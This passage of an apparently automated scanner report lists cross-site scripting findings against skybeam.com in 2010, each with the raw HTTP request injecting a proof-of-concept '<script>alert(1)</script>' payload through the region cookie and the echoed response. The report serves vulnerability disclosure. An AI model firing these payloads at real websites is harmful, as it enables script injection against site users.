X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX3E05E\"><SCRIPT>ALERT(1)</SCRIPT>C123BF659FC" />
...[SNIP]...

1.27. http://skybeam.com/residential.php/images/nav_contact.png [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_contact.png

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2403c"><script>alert(1)</script>a9814629eee was submitted in the region cookie. This input was echoed as 2403c\"><script>alert(1)</script>a9814629eee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/nav_contact.png HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx2403c"><script>alert(1)</script>a9814629eee; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX2403C\"><SCRIPT>ALERT(1)</SCRIPT>A9814629EEE" />
...[SNIP]...

1.28. http://skybeam.com/residential.php/images/nav_home.png [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_home.png

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5dc4"><script>alert(1)</script>2500cccbba1 was submitted in the region cookie. This input was echoed as b5dc4\"><script>alert(1)</script>2500cccbba1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/nav_home.png HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txb5dc4"><script>alert(1)</script>2500cccbba1; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXB5DC4\"><SCRIPT>ALERT(1)</SCRIPT>2500CCCBBA1" />
...[SNIP]...

1.29. http://skybeam.com/residential.php/images/nav_residential.png [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_residential.png

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd327"><script>alert(1)</script>232c733772a was submitted in the region cookie. This input was echoed as cd327\"><script>alert(1)</script>232c733772a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/nav_residential.png HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txcd327"><script>alert(1)</script>232c733772a; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXCD327\"><SCRIPT>ALERT(1)</SCRIPT>232C733772A" />
...[SNIP]...

1.30. http://skybeam.com/residential.php/images/nav_support.png [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_support.png

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a49c3"><script>alert(1)</script>b5c22112f01 was submitted in the region cookie. This input was echoed as a49c3\"><script>alert(1)</script>b5c22112f01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/nav_support.png HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txa49c3"><script>alert(1)</script>b5c22112f01; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 13232
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXA49C3\"><SCRIPT>ALERT(1)</SCRIPT>B5C22112F01" />
...[SNIP]...

1.31. http://skybeam.com/residential.php/images/referral-icon.jpg [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/referral-icon.jpg

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d100a"><script>alert(1)</script>870b4b19b2d was submitted in the region cookie. This input was echoed as d100a\"><script>alert(1)</script>870b4b19b2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/referral-icon.jpg HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txd100a"><script>alert(1)</script>870b4b19b2d; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 13234
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXD100A\"><SCRIPT>ALERT(1)</SCRIPT>870B4B19B2D" />
...[SNIP]...

1.32. http://skybeam.com/residential.php/images/shadowRight.gif [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/shadowRight.gif

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a467"><script>alert(1)</script>b45940fbb19 was submitted in the region cookie. This input was echoed as 1a467\"><script>alert(1)</script>b45940fbb19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/shadowRight.gif HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx1a467"><script>alert(1)</script>b45940fbb19; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 13232
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX1A467\"><SCRIPT>ALERT(1)</SCRIPT>B45940FBB19" />
...[SNIP]...

1.33. http://skybeam.com/residential.php/site-tx/images/call-for-best-offer.gif [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/call-for-best-offer.gif

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46638"><script>alert(1)</script>55ba5edc230 was submitted in the region cookie. This input was echoed as 46638\"><script>alert(1)</script>55ba5edc230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/site-tx/images/call-for-best-offer.gif HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx46638"><script>alert(1)</script>55ba5edc230; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:28 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 13240
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX46638\"><SCRIPT>ALERT(1)</SCRIPT>55BA5EDC230" />
...[SNIP]...

1.34. http://skybeam.com/residential.php/site-tx/images/res-bundle.jpg [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/res-bundle.jpg

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5286"><script>alert(1)</script>feda0b7242d was submitted in the region cookie. This input was echoed as a5286\"><script>alert(1)</script>feda0b7242d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/site-tx/images/res-bundle.jpg HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txa5286"><script>alert(1)</script>feda0b7242d; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:33 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXA5286\"><SCRIPT>ALERT(1)</SCRIPT>FEDA0B7242D" />
...[SNIP]...

1.35. http://skybeam.com/residential.php/site-tx/images/res-internet.jpg [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/res-internet.jpg

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dffa8"><script>alert(1)</script>567f3eb9b7b was submitted in the region cookie. This input was echoed as dffa8\"><script>alert(1)</script>567f3eb9b7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/site-tx/images/res-internet.jpg HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txdffa8"><script>alert(1)</script>567f3eb9b7b; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXDFFA8\"><SCRIPT>ALERT(1)</SCRIPT>567F3EB9B7B" />
...[SNIP]...

1.36. http://skybeam.com/residential.php/site-tx/images/res-phone.jpg [region cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/res-phone.jpg

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3234a"><script>alert(1)</script>9be15874b7b was submitted in the region cookie. This input was echoed as 3234a\"><script>alert(1)</script>9be15874b7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/site-tx/images/res-phone.jpg HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx3234a"><script>alert(1)</script>9be15874b7b; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX3234A\"><SCRIPT>ALERT(1)</SCRIPT>9BE15874B7B" />
...[SNIP]...

Report generated by XSS.CX at Wed Nov 24 19:59:58 CST 2010.